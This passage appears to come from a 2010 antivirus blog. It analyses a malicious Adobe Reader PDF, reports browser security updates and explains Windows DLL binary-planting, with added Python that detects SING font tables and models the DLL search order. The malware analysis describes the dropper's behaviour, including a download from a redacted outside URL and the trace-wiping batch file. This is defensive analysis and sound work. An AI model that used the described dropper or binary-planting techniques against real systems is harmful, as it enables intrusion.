Upon execution the exploit PDF first checks if the Reader is vulnerable and in case the version is too old for this exploit, shows a message that the user should update to a newer Adobe Reader version. It then drops the file “Documents and Settings\<Username>\Local Settings\Temp\hlp.cpl” which is detected as the Trojan TR/Dldr.Small.pgn and starts it. The dropped Trojan in turn tries to download http://xxxxxxxxxxx.us/from/wincrng.exe and to store it as winhelp32.exe – this file is offline, though. Also, it drops the camouflage PDF to “Documents and Settings\<Username>\Application Data\golf clinic.pdf” and opens it via a function in the Trojan called “MakeAndShowEgg”. After all this, the cyber criminals try to wipe the traces of the attack and create the batch file DMS.BAT which deletes the Trojan hlp.cpl.
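As an added example (not Avira's detection logic or any code from the original post), the Python below shows how a scanner can look for the ingredient the post names, a SING table inside a font embedded in a PDF: it pulls each stream out of the file, inflates it when the stream is FlateDecode-compressed, parses the sfnt table directory and reports any SING table, noting whether the uniqueName field is NUL-terminated. The PDF wrapper, the font builder and the table layout assumption (uniqueName occupying 28 bytes at offset 16 of the SING table, as I understand the format) are constructed for the demo; no real exploit file is reproduced.

```python
import re
import struct
import zlib

STREAM_RE = re.compile(rb'stream\r?\n(.*?)endstream', re.S)


def iter_streams(pdf):
    """Yield (dictionary bytes, raw stream bytes) for every stream object."""
    for m in STREAM_RE.finditer(pdf):
        head = pdf[max(0, m.start() - 512):m.start()]
        d = head[head.rfind(b'<<'):]                 # dictionary right before 'stream'
        body = m.group(1)
        length = re.search(rb'/Length\s+(\d+)', d)
        if length:                                   # trust /Length over the regex end
            body = body[:int(length.group(1))]
        yield d, body


def decoded_streams(pdf):
    for d, body in iter_streams(pdf):
        if b'/FlateDecode' in d:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                pass                                 # damaged stream: inspect raw bytes
        yield d, body


def parse_sfnt_tables(data):
    """Return {tag: bytes} from an OpenType/TrueType table directory, or {} if not a font."""
    if data[:4] not in (b'OTTO', b'\x00\x01\x00\x00', b'true'):
        return {}
    (num_tables,) = struct.unpack('>H', data[4:6])
    tables = {}
    for i in range(num_tables):
        entry = data[12 + 16 * i:28 + 16 * i]
        if len(entry) < 16:
            break
        tag, _checksum, offset, length = struct.unpack('>4sIII', entry)
        tables[tag] = data[offset:offset + length]
    return tables


def find_sing_fonts(pdf):
    """Report every embedded font that carries a SING table."""
    findings = []
    for _d, body in decoded_streams(pdf):
        tables = parse_sfnt_tables(body)
        if b'SING' in tables:
            sing = tables[b'SING']
            findings.append({'sing_len': len(sing),
                             'unique_name_unterminated': b'\0' not in sing[16:44]})
    return findings


# ---- constructed sample builder (demo only) ----
def build_sfnt(tables):
    """Minimal sfnt container from {tag: data}; checksums are left zero."""
    n = len(tables)
    header = b'OTTO' + struct.pack('>HHHH', n, 0, 0, 0)
    offset, directory, body = 12 + 16 * n, b'', b''
    for tag, data in tables.items():
        directory += tag + struct.pack('>III', 0, offset + len(body), len(data))
        body += data + b'\0' * (-len(data) % 4)
    return header + directory + body


def build_sample_pdf(unique_name):
    """PDF with one Flate-compressed OpenType font whose SING table carries `unique_name`."""
    sing = b'\0' * 16 + unique_name.ljust(28, b'\0')[:28]
    font = zlib.compress(build_sfnt({b'SING': sing, b'CFF ': b'\0' * 8}))
    return (b'%PDF-1.4\n1 0 obj\n<< /Type /FontDescriptor /FontFile3 2 0 R >>\nendobj\n'
            b'2 0 obj\n<< /Length ' + str(len(font)).encode() +
            b' /Filter /FlateDecode /Subtype /OpenType >>\nstream\n' + font +
            b'\nendstream\nendobj\n%%EOF\n')


if __name__ == '__main__':
    print(find_sing_fonts(build_sample_pdf(b'A' * 28)))
```

A SING table by itself is legitimate (it is how Adobe's glyphlet fonts are identified), so the finding is a trigger for closer inspection rather than a verdict; a full scanner would also follow object streams and other filters, which this demo skips.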

As there is no fix available yet, it is very important to be cautious about which PDF files to open. Don’t open PDF files sent by email from strangers, and refrain from opening PDFs from websites unless you really need them. Where possible, using alternative PDF readers such as the basic embedded one in Google Chrome or Foxit PDF Reader (which isn’t affected by this vulnerability) is a good idea.

Avira has added detection for the malicious PDF as EXP/Pidief.WM.

Wednesday, September 08, 2010

Browser Updates

The Mozilla Foundation just released the popular web browser Firefox in version 3.6.9. The new version fixes 14 security vulnerabilities overall, of which 10 are rated critical by the developers. Additionally, they added support for the “X-FRAME-OPTIONS” header, which should help mitigate clickjacking attacks, as web site owners can ensure with this header that their content isn’t inserted into other sites via frames. The update is available through the automatic update mechanism (via the “Help” – “Search for updates” menu).

The developers at Google already published version 6 of their web browser last week. The release also closes 14 security holes, of which 7 get the “high” rating concerning their impact. The update should be completely automatic and in the background; however, on some Windows XP systems the users need to click the “settings” icon on the right side of the address bar and choose “About Google Chrome”, where they are then offered to install the new release. A nice feature security-wise is the now integrated basic PDF reader. It can be activated by typing “about:plugins” into the address bar. This should help mitigate attacks on outdated versions of PDF readers on the computer. Just since today, a minor update to version 6.0.42.55 is available; it fixes minor issues with autocomplete, setting Chrome as the default browser and importing data from other browsers.

And now even Apple has released an update for its web browser Safari for Mac OS X and Windows – versions 5.0.2 and 4.1.2. It fixes 3 critical security vulnerabilities which allow for malicious code execution – 2 for Mac OS X and Windows and 1 just affecting Safari under the Windows operating systems. The update is available through the automatic updater or can be downloaded manually from Apple's download web site.

As the new browser versions deal with so many critical security vulnerabilities, users and administrators should install them as soon as possible!

Sunday, September 05, 2010

Mitigation for Windows Applications DLL-Search-Path Vulnerabilities

A whole bunch of Windows applications are vulnerable to a so-called binary-planting attack which allows for remote code execution. Microsoft released a security advisory about this issue, which isn’t easy to fix properly. The issue arises from the (defined and well documented) behavior of Windows when an application loads libraries. A .dll to load gets searched for in a certain standard list of paths. This list also includes the current working directory, which is, for example, the place a document gets opened from. When a file with the name of a DLL which the corresponding application needs to load is placed into the working directory, it will get loaded – and this can be a malicious DLL.

Microsoft offers a patch as workaround which adds a registry key influencing this DLL search path. Unfortunately, the changed behavior of DLL loading breaks several Windows programs. Now the company released a Fix-it tool which can be executed after the patch has been applied. It lessens the restrictions introduced by the patch so that most applications do work again. Windows then still blocks loading DLLs from network shares or WebDAV, but if a malicious DLL is located within a local working directory, an attack may still succeed. Anyhow, this may be the only workaround option which is usable.
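As an added example (not Microsoft's code or anything from the original post), the Python below models the documented DLL search order with SafeDllSearchMode enabled (application directory, system directories, Windows directory, current working directory, PATH) and the effect of the CWDIllegalInDllSearch registry value that the workaround sets: 0xFFFFFFFF removes the working directory from the search entirely, 2 skips it only when it is a network share or WebDAV location, 1 only for WebDAV, 0 leaves the documented behavior. It reproduces the two outcomes the paragraph describes, a blocked load from a share and a load that still succeeds from a local working directory. The file set, the directory names and the helper.dll name are constructed for the demo.

```python
# CWDIllegalInDllSearch values as documented by Microsoft for the workaround.
REMOVE_CWD_ALWAYS = 0xFFFFFFFF   # never search the current working directory
BLOCK_CWD_REMOTE = 2             # skip the CWD when it is a network share or WebDAV
BLOCK_CWD_WEBDAV = 1             # skip the CWD only when it is a WebDAV location
ALLOW_CWD = 0                    # default Windows behavior

SYSTEM_DIRS = [r'C:\Windows\System32', r'C:\Windows\System', r'C:\Windows']

# Constructed file set: the viewer ships without helper.dll, and a copy of that
# name sits both on a file share and in a local download folder.
SAMPLE_FS = {p.lower() for p in [
    r'C:\Program Files\Viewer\viewer.exe',
    r'\\fileserver\share\docs\helper.dll',
    r'C:\Users\alice\Downloads\helper.dll',
]}
APP_DIR = r'C:\Program Files\Viewer'


def is_remote(path):
    """UNC paths (\\server\share\...) are network locations; WebDAV also appears as UNC."""
    return path.startswith('\\\\')


def is_webdav(path):
    return is_remote(path) and 'davwwwroot' in path.lower()


def search_order(app_dir, cwd, policy, path_dirs=()):
    """Directories in the order Windows consults them, with the CWD position
    governed by the CWDIllegalInDllSearch policy value."""
    order = [app_dir] + SYSTEM_DIRS
    skip_cwd = (policy == REMOVE_CWD_ALWAYS
                or (policy == BLOCK_CWD_REMOTE and is_remote(cwd))
                or (policy == BLOCK_CWD_WEBDAV and is_webdav(cwd)))
    if not skip_cwd:
        order.append(cwd)
    order.extend(path_dirs)
    return order


def resolve_dll(name, fs, app_dir, cwd, policy, path_dirs=()):
    """Return the directory the DLL would be loaded from, or None if no copy is found."""
    for directory in search_order(app_dir, cwd, policy, path_dirs):
        if (directory.rstrip('\\') + '\\' + name).lower() in fs:
            return directory
    return None


if __name__ == '__main__':
    for cwd in (r'\\fileserver\share\docs', r'C:\Users\alice\Downloads'):
        for policy in (ALLOW_CWD, BLOCK_CWD_REMOTE, REMOVE_CWD_ALWAYS):
            print(cwd, hex(policy), '->', resolve_dll('helper.dll', SAMPLE_FS, APP_DIR, cwd, policy))
```

The model also shows why the only complete fix is on the application side: a DLL that ships in the application directory, or is loaded by full path, is found before the working directory is ever consulted, whatever the policy value.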

Administrators and users are well advised to apply the patch (and, in most cases, lessen the restrictions with the Fix-it tool) so the attack surface gets minimized.